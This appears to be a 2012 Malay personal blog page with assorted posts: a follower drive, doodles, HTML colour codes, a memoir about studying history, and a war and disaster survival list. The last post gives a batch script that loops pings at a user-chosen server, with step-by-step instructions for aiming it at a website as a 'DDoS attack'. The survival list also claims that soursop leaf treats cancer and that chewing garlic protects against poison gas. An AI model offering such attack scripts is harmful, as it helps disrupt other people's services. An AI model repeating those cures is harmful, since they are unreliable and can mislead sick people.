Saturday, November 3, 2012

SEGMEN : Follower Bawah 400

klik banner utk join 


Jom sama-sama kita meriahkan sengmen : follower bawah 400 anjuran Menulis & Menconteng . Segmen adalah agak penting untuk blog kita dikenali disamping menjalin hubungan antara komuniti kita blogger :) Jom join.

Salam Hujung minggu #



SOALAN BOCOR SPM & STPM !


Dalam masa yang terdekat peperiksaan SPM (Sijil Pelajaran Malaysia) bakal melanda.Sudah pasti ianya satu perkara yang mengerunkan untuk pelajar-pelajar sekolah.Dulu Din SPM biasa-biasa ja takdak study2 hard biasa2 ja ada masa main game ada masa study dan buat kerja sekolah haha.

Ok sekarang ni Din akan membongkar (wallah~) soalan-soalan bocor yang anda cari-cari dari tadi tu.Sekarang Din akan tunjukkan anda soalan bocor SPM opss nanti dulu bukan Sijil Pelajaran Malaysia ye tetapi Soalan Para Malaikat di dalam kubur nanti . Jom sama usha soalan tu :) Soalan bocor SPM :

6 SOALAN BOCOR SPM :
1.Siapa Tuhan anda ?
__________________

2.Apa agama anda ?
__________________

3.Siapa nabi anda ?
__________________

4.Apa kitab anda ?
__________________

5.Di mana kiblat anda ?
__________________

6.Siapa saudara anda ?
__________________

UNTUK MENDAPAT TIPS YANG LEBIH UNTUK MENJAWAB SOALAN INI ANDA BOLEHLA KE HALAMAN INI.

http://irwanirah.multiply.com/journal/item/39?&show_interstitial=1&u=%2Fjournal%2Fitem

Salam hari sabtu :)

Tempahan Header Termurah !


Blog siapa yang tiada Header ? Buntu dalam memikirkan idea untuk design header anda ? Mahukan jalan pintas utk mendapatkan header yang cantik ?.Sekarang ni kalau diperhatikan mmg ramai buat income menerusi kegiatan mendesign header atau banner atau template blog dan lain-lain lagi.

Jika anda berminat untuk mendapatkan khidmat membuat header yang cantik dan lagi cun ada boleh cuba tempah disi : http://miaauss.blogspot.com/2012/11/request-membuat-header-dengan-kadar.html

Apa yang beza antara tempah header di sini dengan di tempat lain ? Bezanya tuan tanah blog tu amatlah peramah.Yang penting harga boleh runding-runding macam yang kat pasar malam tu :)

So tggu apa lagi ? haha meh kita order sampai tuan tanah tak cukup tangan nk buat haha :D.Klik gambar di bawah untuk terus menaiki penerbangan percuma ke miaauss.blogspot.com

mia ade auss sorang je (Atotototo) co cuwet~

Pihak Din amatlah menyokong segala usaha murni blogger2 malaysia dalam membantu menaik tarafkan qualitiy blog malaysia . Majulah maju untuk maju . erk

Friday, November 2, 2012

Dulu dan Sekarang .


لسَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُl


Dahulu dan sekarang.Banyak perubahan yang telah din lakukan pada blog ni .Antara yang telah banyak berubah nama domain,Header,Susun atur blog.Tetapi tema blog Din tetap sama yakni Biru dari dahulu dan sekarang.

Dulu,nama blog ni yang pertama adalah Din-Manga-Studio (panjang lebar).Selepas itu berubah kepada Din-HaruBiru-Studio (masing panjang lebar) dan sampai lah sekarang berubah kepada DinGraphic.



Haha trigat lagi masa ni Din baru habis belajar SPM . Photoshop pun sepatah haram tak reti .Reti install je :p Ni pun jenuh tegok tuto daripada SyedGraphix (google : lupa link)

Blajar pnya belajar terlahirlah header yang baru ni .Fuh penat jugak jadi ayah Header baru ni . Dgan Ibu ( Laptop) pun tgah nazak masa lahirkan Header ni . 

Baru berusia berapa hari je.Bagi siapa-siapa yang follow blog ni dari dulu lagi diucapkan terima kasih level 100.Kalau nak tau ,Template blog dulu serabut sgt haha dan ianya sangat RARE ! :D....Jadi sekarang jemput lah singah di teratak kasih ni hehe tak mustahil template ni bakal jadi RARE jugak haha.Bye sekian entry Cakap banyak di hari jumaat penghulu segala hari.Selamat hari jumaat :) Majulah diri untuk diri sendiri :D


Aku dah jatuh cinta dengan doodle aku sendiri hari2 aku tgok kalau la betul2 wujud ringan je mulut aku ni nk ajak kawin haha.


Thursday, November 1, 2012

Doodle Awek Bertudung.


Petang yang ditemani oleh hujan lebat berserta guruh aku........Jangan nak berkarangan sangat lah jom tengok doodle awek bertudung ni hehe.... <3 yang penting matanya bulat...dari mata turun ke hati.


Jom berdoodle.! 


Wednesday, October 31, 2012

Perubahan Design Logo terkenal.




























PANDUAN KECEMASAN KETIKA PERANG/BENCANA.


Siapa yang tidak tahu sekarang ni amareka kena bencana taufan . Kalau kat jepun gempa bumi . First Din perhati kalau berlaku bencana Din akan perhatikan kedai runcit mereka pasti akan sold out habis barang disapu . 

Penting untuk kita mengetahui serba sedikit tentang ilmu survival ni paling kurang pun la blajar cara nk buka pintu kereta dari jarak jauh dengan mengunakan henfon.Just telefon org rumah dan suruh org rumah tekan kunci remote dan halakan ke telefon . tak percaya cuba la.

Di sini Din listkan beberapa PANDUAN KECEMASAN PERANG/BENCANA :
  • Waktu perang jangan memakai seragam yang mengambarkan anda tentera atau yg mempunyai lencana tentera.
  • Belajar mengsterilkan air.Sekurangnya 15 minit utk membunuh bacteria.
  • Pastikan mempuunyai minyak tanah dan minyak masak yg mencukupi.Minyak tanah utk bahan api,minyak masak utk memasak atau sebagai bahan pelincir,juga boleh digunakan sebagai penganti minyak hitam.Minyak tanah dengan sedikit campuran air (tapis dahulu)
  • Simpan basikal anda.Boleh digunakan pada waktu kecemasan.
  • Ketahui lokasi rumah.contoh: jalan alternatif utk sampai ke rumah anda selain daripada jalan utama.
  • Simpan Radio FM/AM.untuk mendengar berita penting.
  • Simpan microfon condenser.kegunaan,lilit pada arial radio dan anda boleh buat pengumuman sejauh 1.5/2 Km dan akan sampai kpd mereka yang mengunakan frekuensi yg sama dgn radio anda.
  • Ada walkie talkie lagi bagus.
  • Elakkan berada di bangunan(bangunan yg tnggi dan yang menonjol/terkenal) yang menjadi sasaran/tidak selamat.
  • Jika perang/atau kemalangan yang berlaku serangan GAS beracun,makan bayang putih kunyah2 dalam mulut..
  • Untuk bekalan makanan.Simpan bekalan makanan yang kering dan yang tahan lama.cth:ikan kering.
  • Jika di hutan.Makan daun atau buah-buahan yang dimakan oleh binatang sahaja,Ular sama,ulat,dan katak sumber protein.Makan utk slamatkan nyawa.(darurat)
  • Jika keadaan tidak mengizinkan kluarkan bateri kereta anda dari dalam kereta.
  • Charger bateri kereta atau moto amat berguna.
  • Generator elektrik amat berguna. ingat panduan yang ke-3.
  • Belajar mengenali struktur rumah anda.Rumah boleh jadi kkubu atau tanah perkuburan anda.Wujudkan comfort zone dengan menyusun susunan perabut anda.
  • Sediakan parang/kapak.
  • Belajar memancing dan bercucuk tanam.
  • Coklat koko, cadbury atau minuman milo dapat memberikan tenaga.
  • Jika berlaku peperangan.Dan anda bajet nk jadi pejuang sila jangan guna sistem telefon GSM 019,014,012,017 dll . satelit boleh kesan kedudukan korang :) senang cita nombor korg skrg ni x kira 010 ke ape ke haha
  • Kalau perang sentiasa bergerak menundukkan kepala.
  • Anda tidak akan mati jika tercedera/ditembak kecuali pada zon-zon bahaya.anda akan mati disebabkan kehilangan darah.Cari jalan hentikan darah.
  • Sasaran bergerak sukar utk ditembak (jika di tembak haha)
  • Belajar menembak.Untung budak2 PLKN.Alhamdulilah saya pnah belajar mengendalikan M-16 A1.
  • Skrg ni lau ada duit beli la buku panduan utk survival :)
Kalau anda sakit #
  • Batuk kering - Minuman koko ( serbuk van Houten dalam tin) dibancuh boleh menghilangkan batuk.
  • Diabetes - boleh guna kapsul Gymnema & Fenugreek.
  • Kanser- Gunakan daun durian belanda.keringkan dalam oven.Tumbuk jadi serbuk teh .bancuh dan minum.
  • Amalkan quaker oat sebagai makanan ruji.baik utk jantung.

  • Untuk mendapatkan pandangan ala-ala NIGHT VISION.Bila menjelang magrib fokus mata pada satu-satu benda untuk mmbolehkan anak mata memperbaiki  bukaan mata.Ini boleh membantu anda melihat dalam gelap.
Sekadar berkongsi untuk yang lebih lengkap boleh lah melayari ke sini : 

Banyak betul bencana sekarang ni :) are you ready :D



Tuesday, October 30, 2012

Kisah Cinta ala-ala Ongbak Taufan .

Cuba korang baca kisah cinta din yang pasti akan membuatkan korang tangkap leleh (x percaye?).Filem ini dijangka bakal mencetuskan fenomena.Kutipan untung mencapai MYR 20000 juta.Tanpa buang masa jom kita saksikan :D cekidout !




"saya memainkan watak saya dengan sungguh berkesan dalam filem ni ". kata Din sebagai watak utama.Saya berharap pada tahun ni saya dapat mengondol semua anugerah tidak kira di kampung ataupun di bandar bak kate orang sapu bersih. BERNAMA.

Sunday, October 28, 2012

KOD WARNA HTML







#FFCCFF#FFCCCC#FFCC99#FFCC66#FFCC33#FFCC00






#FF99FF#FF99CC#FF9999#FF9966#FF9933#FF9900






#FF66FF#FF66CC#FF6699#FF6666#FF6633#FF6600






#FF00FF#FF00CC#FF0099#FF0066#FF0033#FF0000






#CCFFFF#CCFFCC#CCFF99#CCFF66#CCFF33#CCFF00






#CCCCFF#CCCCCC#CCCC99#CCCC66#CCCC33#CCCC00






#CC99FF#CC99CC#CC9999#CC9966#CC9933#CC9900






#CC66FF#CC66CC#CC6699#CC6666#CC6633#CC6600






#CC33FF#CC33CC#CC3399#CC3366#CC3333#CC3300






#CC00FF#CC00CC#CC0099#CC0066#CC0033#CC0000






#99FFFF#99FFCC#99FF99#99FF66#99FF33#99FF00






#99CCFF#99CCCC#99CC99#99CC66#99CC33#99CC00






#00CCFF#00CCCC#00CC99#00CC66#00CC33#00CC00






#0099FF#0099CC#009999#009966#009933#009900






#0066FF#0066CC#006699#006666#006633#006600






#FFFFFF#FFFFCC#FFFF99#FFFF66#FFFF33#FFFF00






#FF33FF#FF33CC#FF3399#FF3366#FF3333#FF3300






#9999FF#9999CC#999999#999966#999933#999900






#9966FF#9966CC#996699#996666#996633#996600






#9933FF#9933CC#993399#993366#993333#993300






#9900FF#9900CC#990099#990066#990033#990000






#66FFFF#66FFCC#66FF99#66FF66#66FF33#66FF00






#6600FF#6600CC#660099#660066#660033#660000






#33FFFF#33FFCC#33FF99#33FF66#33FF33#33FF00






#33CCFF#33CCCC#33CC99#33CC66#33CC33#33CC00






#33CCFF#33CCCC#33CC99#33CC66#33CC33#33CC00






#3333FF#3333CC#333399#333366#333333#333300






#3300FF#3300CC#330099#330066#330033#330000






#00FFFF#00FFCC#00FF99#00FF66#00FF33#00FF00






#3399FF#3399CC#339999#339966#339933#339900






#3366FF#3366CC#336699#336666#336633#336600






#66CCFF#66CCCC#66CC99#66CC66#66CC33#66CC00






#6699FF#6699CC#669999#669966#669933#669900






#6666FF#6666CC#666699#666666#666633#666600






#6633FF#6633CC#663399#663366#663333#663300








#0033FF#0033CC#003399#003366#003333#003300






#0000FF#0000CC#000099#000066#000033#000000

Bagi yang suka tukar-tukar kaler dekat blog tu tapi tak tau kod warna anda boleh rujuk disini :) Menjadi masalah kalau nk main hafal kod warna ni kan nah din bagi sebijij-sebijik.Sekian entry backup hasil daripada entry novel din sebelum ni haha.

AKU DAN SEJARAH .

Sejarah satu matapelajaran yang amat digeruni oleh sesetengah pelajar.Ini kerana pelajar perlu menghafal bnyk term dan bnyk lagi.Ianya amat lah bermasalah bagi otak yang mempunyai RAM(RANDOM ACCESS MEMORY) yang rendah . Ini adalah entry berkenaan diri aku dan sejarah....(ayat skema tahap 99 darjah)

Pada asalnya aku blajar sejarah sebab mmg kena blajar.Tapi ada satu benda yang telah merangsang aku untuk belajar subjek sejarah dengan penuh ghairah sekali.Benda yang merangsang aku untuk blajar sejarah dengan lebih serius hanyalah sekeping gambar dalam buku teks.YA! Bukannya alat pengoncang mahupun penggegar ia hanya lah sekeping gambar.


Gambar yang dimaksudkan adalah gmbar tentera jepun naik basikal untuk masuk ke tanah melayu.Serius gila pelik aku ni.Gambar ni ada dalam buku teks sejarah tingkatan 3.Sebelum masuk bab ni serius bosan haha.Disebabkan Din ni jenis yang minat sejarah perang memang aku belek habis la bab ni dulu haha.Aku amat berterima kasih dengan gambar perangsang ni haha sebab gambar ni aku score A walaupun tak buat folio sejarah pasal gasing tu hua hua hua.Dan disebabkan gambar ni prestasi aku dalam subjek sejarah amatlah menyamai tahap professor shingga di jelessi oleh budak-budak kelas sains . ( tu riak nak mampoih)

Selepas tamat persekolahan aku berharap aku dapat lah menjadi lawyer tapi aku buat kejutan dengan pilih Grafik & Media Digital di uitm sri iskandar.

Tidak sampai disitu aku sekali lagi membuat kejutan dengan pergi ke latihan asas selama dua minggu di ILTU(institut latihan tentera udara) di ipoh bersebelahan hentian gopeng di jalan lapangan terbang lama.Sampai macam ni sekali sejarah mempengaruhi hidup aku.Din seorang yang minat terhadap military sangat-sangat,(kat rumah siap ada barang2 tactical haha).Walaupun blajar Grafik,namun Military dan aku tidak akan berpisah :P ( semangat patriotik sat).


Sebenarnya din mmg minat dengan sejarah dari kecik lagi tapi tahap pengetahuan sejarah masa kecik hanya pada peperangan je haha.Tiap kali saving private ryan atau crita perang apa skali pun aku tkkan miss waw haha.Gambar tentera jepun tu yang menjadi pembangkit semangat nk blajar sejarah haha.(macam novel momok kan din tulis>?)



Subjek sejarah membawa aku sampai di mana aku berada sekarang terima kasih cikgu dan buku teks :D


Begitulah bagaimana subjek sejarah mempengaruhi dalam kehidupan aku. :).Sekian sudah leteran aku pada hari ni.Panjang kan ? ok.haha memang panjang . :p semangat nak menulis harini sangat membuak-buak!

Pesanan kepada calon SPM 12' : nak blajar sejarah first skali kena ada minat kalau tak dak menda tu mmg payah sebab nk kena menghafal.kalau korang ada otak yang RAM sampai 8-10 gb tu satu kelebihan.Blajar la sunguh-sungguh jangan nak becinta-cinta.kalau nk becinta meh sini dgn din AUMMMM !!!! LOL

SEKIAN ENTRY YANG TAK BERMANFAAT.

















DDoS cara senang .


DDoS - DDOS ni sebenar adalah Distributed Denial Of Service.........ia sebenarnya adalah satu serangan dari hackers dengan memflood kan certain² IP yang akan mengakibatkan network mangsa serangan menjadi lembab atau tidak berfungsi. Ini adalah kerana TCP/IP akan menghantar satu packet handshake untuk mengestablishkan connection........ 


Contoh..... 



SYN 

Client --------------> Host 


Client akan menghantar packet GET kepada host untuk mendapatkan maklumat yang dikehendaknya. Misalnya kita nak buka laman Ittutor....so kita akan taip www.example.net....betul tak.....cuba bayangkan kita menjadi packet GET, :roll: sebaik sahaja kita tekan enter...........kita akan terus ke server (host) laman web example.net......dan apabila handshake (jabat tangan) sebagai tanda kita dah setuju.....host akan hantar balik maklumat yang kita nak....... 


SYN/ACK 
Client <--------------Host 



so DDOS ni bermakna penyerang akan menghantar seberapa banyak packet GET yang kosong(tidak membawa maklumat berguna) ni sehinggakan host tak sudah tidak mampu untuk menampungnya maka terjadilah lagging dan sebagainya.... 



ader banyak jenis serangan DDOS antaranya ialah: 



Land attack 

Smurf Attack 
Udp flooding 
Ping of death 
Tear Drop 

_________________________________________________________________________________

Baiklah DDoS attack ni korang boleh lakukan dengan hanya mengunakan notepad.Pertama sekali copy+paste kod bawah ni di notepad korang :

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

Seterusnya save as kod tadi dalam note pad sebagai : DDoS attack.bat
SAVE AS TYPE : ALL TYPE
 OK.Done #


Cara-cara menggunakannya :

1. Double click file anda itu.
2. Akan tertera : Server-Target:













Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.
Contoh :
Sebelum= http://www.____.blogspot.com/
Tukarkan kepada = www.___.blogspot.com
Setelah memasukkan url itu, tekan enter.

3. Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.
Setelah selesai ping, akan keluar seperti ini :

Pinging www.___.blogspot.com [209.85.175.106] with 32 bytes of data:
Reply from XXX.XX.XXX.XXX: bytes=32 time=30ms TTL=56
Reply from XX.XX.XXX.XXX: bytes=32 time=40ms TTL=55
Reply from XX.XX.XXX.XXX: bytes=32 time=24ms TTL=56
Reply from XXX.XX.XXX.XXX: bytes=32 time=36ms TTL=56
Ping statistics for XXX.XX.XXX.XXX:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 24ms, Maximum = 40ms, Average = 32ms
XXX.XX.XXX.XXX <-----Contohlah IP address bagi www.___.blogspot.com adalah XXX.XX.XXX.XXX
Caranya sama jugak untuk website lain.













4. Selepas itu, akan terpapar di tool itu :  ip Host:
Masukkan saja ip address yg anda dapat tadi.
Contoh :
ip Host:XXX.XX.XXX.XXX
dan tekan enter.
5. Akhir sekali akan keluar pula :  Packet Size :
Letakkan berapa bnyak yg anda mahu.lagi banyak lagi kuat.
Contoh :
Packet Size : 10000000
Dan tekan enter.
6. Akan terpapar : Attacking Server.....
Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

KLIK GAMBAR KALAU X NAMPAK !
















NOTA TAPAK TANGAN :DDoS attack hanya berkesan jika diserang oleh banyak  server.Ini bermakna  hanya berkesan jika DDoS cara ni dilakukan secara berjemaah je mean bnyak org attack lah...kalau sorang je yg attack lebih baik ko gi surau berjemaah :).

MY NAME IS DIN IM NOT PROGRAMMER BUT IM GRAPHIC DESIGNER.
Related Posts Plugin for WordPress, Blogger...

Search

Loading...

FOLLOW ME ?

Google+

CBOX

Blog Archive

Entry Panas Speanjang Zaman :


Blogger Popular

Get this widget